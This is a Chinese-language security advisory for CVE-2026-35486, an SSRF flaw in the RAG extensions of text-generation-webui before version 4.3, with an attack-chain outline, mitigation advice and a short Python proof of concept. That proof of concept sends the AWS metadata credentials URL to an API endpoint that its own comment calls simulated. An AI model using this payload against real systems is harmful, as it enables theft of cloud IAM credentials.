IPBUF安全漏洞报告
English
CVE-2026-35486 CVSS 7.5 高危

CVE-2026-35486: text-generation-webui RAG扩展SSRF漏洞

披露日期: 2026-04-07

漏洞信息

漏洞编号
CVE-2026-35486
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
text-generation-webui

相关标签

SSRFtext-generation-webuiRAGLLM信息泄露

漏洞概述

text-generation-webui是一个用于运行大语言模型的开源Web界面。在4.3版本之前,其superbooga和superboogav2 RAG扩展存在严重的安全漏洞。该扩展在处理用户提供的URL时,未进行任何验证(如协议检查、IP过滤或主机名白名单),直接使用requests.get()发起请求。这允许攻击者利用该漏洞访问云元数据端点、窃取IAM凭证,并探测内部网络服务。获取的数据随后通过RAG管道泄露。该问题已在4.3版本中修复。

技术细节

该漏洞属于典型的服务端请求伪造(SSRF)。受影响的RAG扩展旨在获取外部URL内容以增强生成结果,但代码逻辑中缺失了对用户输入的安全校验。具体而言,系统未对`http/https`等scheme进行强制检查,也没有对内网IP段(如127.0.0.1, 169.254.169.254等)实施黑名单过滤或白名单限制。攻击者可以构造恶意请求,将URL指向云服务商的元数据服务(如AWS IMDS),从而获取实例的临时凭证。由于应用未做隔离,攻击者还能利用该应用作为跳板,扫描并探测内网中的其他开放端口和服务。敏感内容会被整合进RAG的检索结果中,从而间接泄露给前端用户。

攻击链分析

STEP 1
1. 侦察与发现
攻击者识别出目标运行的是text-generation-webui,并启用了superbooga或superboogav2 RAG扩展。
STEP 2
2. 构造恶意请求
攻击者向RAG扩展的API接口发送请求,参数中包含内网敏感地址(如云元数据服务地址 http://169.254.169.254)。
STEP 3
3. 服务端请求伪造
由于缺乏验证,服务器端使用requests.get()直接请求攻击者指定的内网地址。
STEP 4
4. 数据获取与外带
内网服务返回敏感数据(如IAM凭证),RAG扩展将其处理并包含在响应中返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (vulnerable text-generation-webui instance) target_url = "http://localhost:7860" # Malicious payload pointing to AWS Metadata Service (SSRF) # This simulates sending a request to the vulnerable RAG extension malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" payload = { "url": malicious_url, "extension": "superbooga" } # Send the malicious request # In a real scenario, this would be via the specific API endpoint of the extension response = requests.post(f"{target_url}/api/rag-process", json=payload) if response.status_code == 200: print("SSRF successful. Response:") print(response.text) else: print("Exploit failed.")

影响范围

text-generation-webui < 4.3

防御指南

临时缓解措施
如果无法立即升级,建议禁用superbooga和superboogav2扩展。同时,应在防火墙或安全组层面阻断应用服务器对169.254.169.254(AWS/GCP/Azure元数据IP)及其他内网网段的出站连接,以防止凭证窃取。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表